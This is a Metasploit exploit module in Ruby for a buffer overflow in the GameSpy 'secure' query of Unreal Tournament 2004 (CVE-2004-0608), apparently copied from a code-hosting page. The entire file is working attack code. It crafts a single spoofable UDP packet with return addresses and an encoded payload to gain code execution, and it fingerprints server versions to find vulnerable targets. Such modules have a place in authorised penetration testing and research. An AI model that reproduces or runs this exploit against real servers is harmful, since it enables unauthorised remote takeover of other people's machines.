Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = GoodRanking
8

9
  include Msf::Exploit::Remote::Udp
10

11
  def initialize(info = {})
12
    super(update_info(info,
13
      'Name'           => 'Unreal Tournament 2004 "secure" Overflow (Win32)',
14
      'Description'    => %q{
15

16
      This is an exploit for the GameSpy secure query in
17
      the Unreal Engine.
18

19
      This exploit only requires one UDP packet, which can
20
      be both spoofed and sent to a broadcast address.
21
      Usually, the GameSpy query server listens on port 7787,
22
      but you can manually specify the port as well.
23

24
      The RunServer.sh script will automatically restart the
25
      server upon a crash, giving us the ability to
26
      bruteforce the service and exploit it multiple
27
      times.
28

29
      },
30
      'Author'         => [ 'stinko' ],
31
      'License'        => BSD_LICENSE,
32
      'References'     =>
33
        [
34
          [ 'CVE', '2004-0608'],
35
          [ 'OSVDB', '7217'],
36
          [ 'BID', '10570'],
37

38
        ],
39
      'Privileged'     => true,
40
      'Payload'        =>
41
        {
42
          'Space'    => 512,
43
          'BadChars' => "\x5c\x00",
44
        },
45
      'Platform'       => 'win',
46
      'Targets'        =>
47
        [
48
          ['UT2004 Build 3186', { 'Rets' => [ 0x10184be3, 0x7ffdf0e4 ] }], # jmp esp
49
        ],
50
      'DisclosureDate' => '2004-06-18',
51
      'DefaultTarget' => 0))
52

53
    register_options(
54
      [
55
        Opt::RPORT(7787)
56
      ])
57

58
  end
59

60
  def exploit
61
    connect_udp
62

63
    buf = make_nops(1024)
64
    buf[0, 60] = [target['Rets'][0]].pack('V') * 15
65
    buf[54, 4] = [target['Rets'][1]].pack('V')
66
    buf[0,  8] = "\\secure\\"
67
    buf[buf.length - payload.encoded.length, payload.encoded.length] = payload.encoded
68

69
    udp_sock.put(buf)
70

71
    handler
72
    disconnect_udp
73
  end
74

75
  def ut_version
76
    connect_udp
77
    udp_sock.put("\\basic\\")
78
    res = udp_sock.recvfrom(8192)
79
    disconnect_udp
80

81
    if (res and (m=res.match(/\\gamever\\([0-9]{1,5})/)))
82
      return m[1]
83
    end
84

85
    return
86
  end
87

88
  def check
89
    vers = ut_version
90

91
    if (not vers)
92
      print_status("Could not detect Unreal Tournament Server")
93
      return
94
    end
95

96
    vprint_status("Detected Unreal Tournament Server Version: #{vers}")
97
    if (vers =~ /^(3120|3186|3204)$/)
98
      vprint_status("This system appears to be exploitable")
99
      return Exploit::CheckCode::Appears
100
    end
101

102

103
    if (vers =~ /^(2...)$/)
104
      vprint_status("This system appears to be running UT2003")
105
      return Exploit::CheckCode::Detected
106
    end
107

108
    vprint_status("This system appears to be patched")
109
    return Exploit::CheckCode::Safe
110
  end
111
end
112

113